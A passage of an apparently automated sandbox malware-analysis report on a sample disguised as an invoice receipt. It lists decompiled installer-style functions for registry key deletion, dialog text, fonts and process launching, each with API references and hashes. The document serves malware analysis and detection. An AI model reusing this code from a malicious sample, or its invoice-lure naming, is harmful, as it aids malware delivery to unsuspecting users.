Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

Strings

... %d%%, xrefs: 00402C23

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 632923820-2449383134
Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE

Uniqueness

Uniqueness Score: -1.00%

Function 00402A28, Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402A28(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A28(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405DA3(2);
					if(_t27 == 0) {
						if( *0x423f50 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}

0x00402a49
0x00402a51
0x00402a79
0x00402a63
0x00402ab3
0x00402ab9
0x00000000
0x00402abb
0x00402a77
0x00000000
0x00000000
0x00402a77
0x00402a8e
0x00402a96
0x00402a9d
0x00402ac9
0x00000000
0x00000000
0x00402ad1
0x00402ad9
0x00000000
0x00000000
0x00000000
0x00402ad9
0x00000000
0x00402aac
0x00402ac0

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A49
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
RegCloseKey.ADVAPI32(?), ref: 00402A8E
RegCloseKey.ADVAPI32(?), ref: 00402AB3
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401ccb
0x00401cd2
0x00401d01
0x00401d09
0x00401d10
0x00401d10
0x00402880
0x0040288c

APIs

GetDlgItem.USER32 ref: 00401CC5
GetClientRect.USER32 ref: 00401CD2
LoadImageA.USER32 ref: 00401CF3
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
DeleteObject.GDI32(00000000), ref: 00401D10

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29

Uniqueness

Uniqueness Score: -1.00%

Function 00404610, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
			}

0x00404618
0x0040461c
0x00404624
0x00404627
0x00404628
0x0040462a
0x0040462c
0x0040462f
0x0040462f
0x00404636
0x0040463c
0x0040463c
0x00404643
0x0040464e
0x0040464f
0x00404652
0x00404652
0x0040465f
0x0040466a
0x0040466d
0x0040467f
0x00404686
0x00404687
0x00404696
0x004046a6
0x004046c2

APIs

lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
wsprintfA.USER32 ref: 004046A6
SetDlgItemTextA.USER32 ref: 004046B9

Strings

%u.%u%s%s, xrefs: 00404688

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029CB(3);
				 *(_t55 + 8) = E004029CB(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029E8(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029E8();
					_t28 = E004029E8();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029CB();
					_t37 = E004029CB();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E004059E3();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}

0x00401bb6
0x00401bc2
0x00401bc5
0x00401bce
0x00401bce
0x00401bd1
0x00401bd5
0x00401bde
0x00401bde
0x00401be1
0x00401be5
0x00401be7
0x00401c34
0x00401c36
0x00401c3f
0x00401c47
0x00401c4a
0x00401c4a
0x00401c53
0x00000000
0x00401be9
0x00401bf0
0x00401bf2
0x00401bfa
0x00401bfd
0x00401c25
0x00401c59
0x00401c59
0x00401bff
0x00401c0d
0x00401c15
0x00401c18
0x00401c18
0x00401bfd
0x00401c5c
0x00401c5f
0x00401c65
0x00402825
0x00402825
0x00402880
0x0040288c

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25

Strings

!, xrefs: 00401BE1

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728

Uniqueness

Uniqueness Score: -1.00%

Function 004052E5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004052E5(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x004052ee
0x0040530a
0x00405312
0x00405317
0x00000000
0x0040531d
0x00405321

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
CloseHandle.KERNEL32(?), ref: 00405317

Strings

Error launching installer, xrefs: 004052F8
C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
API String ID: 3712363035-2984075973
Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69

Uniqueness

Uniqueness Score: -1.00%

Function 00405578, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405578(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40900c);
				}
				return _t7;
			}

0x00405579
0x00405590
0x00405598
0x00405598
0x004055a0

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
lstrcatA.KERNEL32(?,0040900C), ref: 00405598

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405578

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3916508600
Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE

Uniqueness

Uniqueness Score: -1.00%

Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029E8(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x00401ec7
0x00401ecf
0x00401ed4
0x00401ed9
0x00401edd
0x00401ee0
0x00401ee2
0x00401ee9
0x00401ef2
0x00401efa
0x00401efd
0x00401f12
0x00401f18
0x00401f2b
0x00401f34
0x00401f40
0x00401f45
0x00401f45
0x00401f2b
0x00401f48
0x00401b75
0x00401b75
0x00401efd
0x00402880
0x0040288c

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24

Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
				 *0x40af7c = E004029CB(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af83 = 1;
				 *0x40af80 = _t11 & 0x00000001;
				 *0x40af81 = _t11 & 0x00000002;
				 *0x40af82 = _t11 & 0x00000004;
				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af6c);
				_push(_t14);
				_push(_t26);
				E004059E3();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x00401d29
0x00401d42
0x00401d4c
0x00401d51
0x00401d5c
0x00401d63
0x00401d75
0x00401d7b
0x00401d80
0x00401d8a
0x004024aa
0x00401561
0x00402825
0x00402880
0x0040288c

APIs

GetDC.USER32(?), ref: 00401D22
GetDeviceCaps.GDI32(00000000), ref: 00401D29
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F

Uniqueness

Uniqueness Score: -1.00%

Function 00403897, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403897(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E004059FC(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423eb0 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E004059E3(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
						_t11 =  *0x423ecc;
						_t27 =  *0x423ec8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405AA7(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x0040389b
0x004038a0
0x004038a6
0x004038ab
0x004038ab
0x004038b3
0x00000000
0x00000000
0x004038bb
0x004038c3
0x004038c5
0x004038cb
0x004038cb
0x004038cd
0x004038d9
0x00000000
0x00000000
0x004038dd
0x00000000
0x00000000
0x00000000
0x004038df
0x004038e4
0x004038ed
0x004038f3
0x004038f8
0x0040390c
0x00403917
0x0040392f
0x00403935
0x0040393a
0x00403942
0x00403963
0x00403963
0x00403963
0x00403944
0x00403946
0x00403946
0x0040394a
0x00403951
0x00403951
0x00403956
0x0040395c
0x0040395c
0x00000000
0x00403946
0x004038fa
0x004038ff
0x00403908
0x00403901
0x00403901
0x00403901
0x004038ff

APIs

SetWindowTextA.USER32(00000000,004236A0), ref: 0040392F

Strings

1033, xrefs: 0040389B, 004038A5, 00403916
C:\Users\user\AppData\Local\Temp\, xrefs: 00403898

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

